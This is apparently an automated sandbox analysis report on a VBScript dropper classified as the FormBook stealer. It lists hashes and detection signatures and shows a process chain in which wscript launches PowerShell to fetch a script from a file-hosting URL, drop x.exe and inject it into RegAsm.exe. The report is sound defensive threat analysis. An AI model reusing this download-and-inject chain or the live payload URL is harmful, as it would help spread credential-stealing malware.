Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
scan file.Vbs.vbs

Overview

General Information

Sample name:scan file.Vbs.vbs
Analysis ID:1592503
MD5:05858832309fb4678a256789d4104520
SHA1:7f46ed7c8b3dc0736c9cecfb435ec73caa8faef6
SHA256:51faf4a204e0fafc59933beab6d6702e337b10218bf11b1ec81fe50a278d3bb2
Tags:vbsuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected VBS Downloader Generic
AI detected suspicious sample
Allocates memory in foreign processes
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
PE file contains section with special chars
PE file has nameless sections
Powershell drops PE file
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5212 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan file.Vbs.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4280 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • x.exe (PID: 6736 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 700263396E8D316FC5651BC5B4E456EC)
        • RegAsm.exe (PID: 7028 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
scan file.Vbs.vbsJoeSecurity_VBS_Downloader_GenericYara detected VBS Downloader GenericJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000002.1906683067.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.1907541991.0000000002E00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Process Memory Space: powershell.exe PID: 4280INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x621c9:$b1: ::WriteAllBytes(
        • 0x308114:$b1: ::WriteAllBytes(
        • 0x621e5:$b2: ::FromBase64String(
        • 0x308130:$b2: ::FromBase64String(
        • 0x22c59:$s1: -join
        • 0x27ab0:$s1: -join
        • 0x14de13:$s1: -join
        • 0x15aee8:$s1: -join
        • 0x15e2ba:$s1: -join
        • 0x15e96c:$s1: -join
        • 0x16045d:$s1: -join
        • 0x162663:$s1: -join
        • 0x162e8a:$s1: -join
        • 0x1636fa:$s1: -join
        • 0x163e35:$s1: -join
        • 0x163e67:$s1: -join
        • 0x163eaf:$s1: -join
        • 0x163ece:$s1: -join
        • 0x16471e:$s1: -join
        • 0x16489a:$s1: -join
        • 0x164912:$s1: -join

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          6.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Script Initiated Connection to Non-Local Network
            Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5212, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49706
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan file.Vbs.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan file.Vbs.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan file.Vbs.vbs", ProcessId: 5212, ProcessName: wscript.exe
            Sigma detected: Script Initiated Connection
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5212, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49706
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan file.Vbs.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan file.Vbs.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan file.Vbs.vbs", ProcessId: 5212, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan file.Vbs.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5212, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", ProcessId: 4280, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-16T08:29:19.709247+010020188561A Network Trojan was detected108.181.20.35443192.168.2.849706TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-16T08:29:19.622332+010028275781A Network Trojan was detected192.168.2.849706108.181.20.35443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.1906683067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1907541991.0000000002E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
            Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.8:49706 version: TLS 1.2
            Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp

            Spreading

            barindex
            Yara detected VBS Downloader Generic
            Source: Yara matchFile source: scan file.Vbs.vbs, type: SAMPLE

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2827578 - Severity 1 - ETPRO MALWARE Likely Dropper Doc GET to .moe TLD : 192.168.2.8:49706 -> 108.181.20.35:443
            Source: Network trafficSuricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 108.181.20.35:443 -> 192.168.2.8:49706
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 108.181.20.35 443Jump to behavior
            Source: Joe Sandbox ViewIP Address: 108.181.20.35 108.181.20.35
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /qrz18p.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /qrz18p.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: files.catbox.moe
            Source: powershell.exe, 00000003.00000002.1547470385.000001C1E3ECD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1521457119.000001C1D55B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000003.00000002.1521457119.000001C1D546F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000003.00000002.1521457119.000001C1D3E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000003.00000002.1521457119.000001C1D5054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000003.00000002.1521457119.000001C1D546F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000003.00000002.1521457119.000001C1D3E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000003.00000002.1521457119.000001C1D55B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000003.00000002.1521457119.000001C1D55B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000003.00000002.1521457119.000001C1D55B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: wscript.exe, 00000001.00000002.1503629523.00000257C8A8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500982252.00000257C8A8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1501698354.00000257C8C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500731435.00000257C8A83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe
            Source: wscript.exe, 00000001.00000002.1503629523.00000257C8A8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500982252.00000257C8A8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500731435.00000257C8A83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/
            Source: wscript.exe, 00000001.00000003.1501005949.00000257CA881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500731435.00000257C8A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1503840327.00000257CA880000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1503662841.00000257C8C45000.00000004.00000020.00020000.00000000.sdmp, scan file.Vbs.vbsString found in binary or memory: https://files.catbox.moe/qrz18p.ps1
            Source: wscript.exe, 00000001.00000003.1501698354.00000257C8C05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/qrz18p.ps1#/_
            Source: wscript.exe, 00000001.00000002.1503629523.00000257C8A8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500982252.00000257C8A8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500731435.00000257C8A83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/qrz18p.ps14
            Source: wscript.exe, 00000001.00000002.1503629523.00000257C8A8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500982252.00000257C8A8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1501698354.00000257C8C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500731435.00000257C8A83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe;
            Source: powershell.exe, 00000003.00000002.1521457119.000001C1D546F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: wscript.exe, 00000001.00000002.1504051186.00000257CAC70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comN
            Source: powershell.exe, 00000003.00000002.1547470385.000001C1E3ECD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1521457119.000001C1D55B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000003.00000002.1521457119.000001C1D5054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000003.00000002.1521457119.000001C1D5054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.8:49706 version: TLS 1.2

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.1906683067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1907541991.0000000002E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: Process Memory Space: powershell.exe PID: 4280, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            PE file contains section with special chars
            Source: x.exe.3.drStatic PE information: section name: ShS!}
            PE file has nameless sections
            Source: x.exe.3.drStatic PE information: section name:
            Powershell drops PE file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0042C833 NtClose,6_2_0042C833
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F835C0 NtCreateMutant,LdrInitializeThunk,6_2_02F835C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_02F82C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_02F82DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F84340 NtSetContextThread,6_2_02F84340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F83090 NtSetValueKey,6_2_02F83090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F83010 NtOpenDirectoryObject,6_2_02F83010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F84650 NtSuspendThread,6_2_02F84650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82AF0 NtWriteFile,6_2_02F82AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82AD0 NtReadFile,6_2_02F82AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82AB0 NtWaitForSingleObject,6_2_02F82AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82BF0 NtAllocateVirtualMemory,6_2_02F82BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82BE0 NtQueryValueKey,6_2_02F82BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82BA0 NtEnumerateValueKey,6_2_02F82BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82B80 NtQueryInformationFile,6_2_02F82B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82B60 NtClose,6_2_02F82B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F839B0 NtGetContextThread,6_2_02F839B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82EE0 NtQueueApcThread,6_2_02F82EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82EA0 NtAdjustPrivilegesToken,6_2_02F82EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82E80 NtReadVirtualMemory,6_2_02F82E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82E30 NtWriteVirtualMemory,6_2_02F82E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82FE0 NtCreateFile,6_2_02F82FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82FB0 NtResumeThread,6_2_02F82FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82FA0 NtQuerySection,6_2_02F82FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82F90 NtProtectVirtualMemory,6_2_02F82F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82F60 NtCreateProcessEx,6_2_02F82F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82F30 NtCreateSection,6_2_02F82F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82CF0 NtOpenProcess,6_2_02F82CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82CC0 NtQueryVirtualMemory,6_2_02F82CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82CA0 NtQueryInformationToken,6_2_02F82CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82C60 NtCreateKey,6_2_02F82C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82C00 NtQueryInformationProcess,6_2_02F82C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82DD0 NtDelayExecution,6_2_02F82DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82DB0 NtEnumerateKey,6_2_02F82DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F83D70 NtOpenThread,6_2_02F83D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82D30 NtUnmapViewOfSection,6_2_02F82D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82D10 NtMapViewOfSection,6_2_02F82D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F83D10 NtOpenProcessToken,6_2_02F83D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82D00 NtSetInformationFile,6_2_02F82D00
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB4ACF102D3_2_00007FFB4ACF102D
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_015511E05_2_015511E0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_015508485_2_01550848
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_015528D05_2_015528D0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_015507C15_2_015507C1
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_015507E05_2_015507E0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_015528C15_2_015528C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040E0606_2_0040E060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040E0636_2_0040E063
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004100736_2_00410073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004168AE6_2_004168AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004168B36_2_004168B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004031206_2_00403120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004011A06_2_004011A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040E1A76_2_0040E1A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040E1B36_2_0040E1B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004022C06_2_004022C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040E2856_2_0040E285
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004022B26_2_004022B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004022B46_2_004022B4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00402B9E6_2_00402B9E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00402BA06_2_00402BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040E3BF6_2_0040E3BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040FE4A6_2_0040FE4A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040FE536_2_0040FE53
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004026606_2_00402660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0042EEC36_2_0042EEC3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF12ED6_2_02FF12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300132D6_2_0300132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6B2C06_2_02F6B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300A3526_2_0300A352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F552A06_2_02F552A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF02746_2_02FF0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030103E66_2_030103E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5E3F06_2_02F5E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F9739A6_2_02F9739A
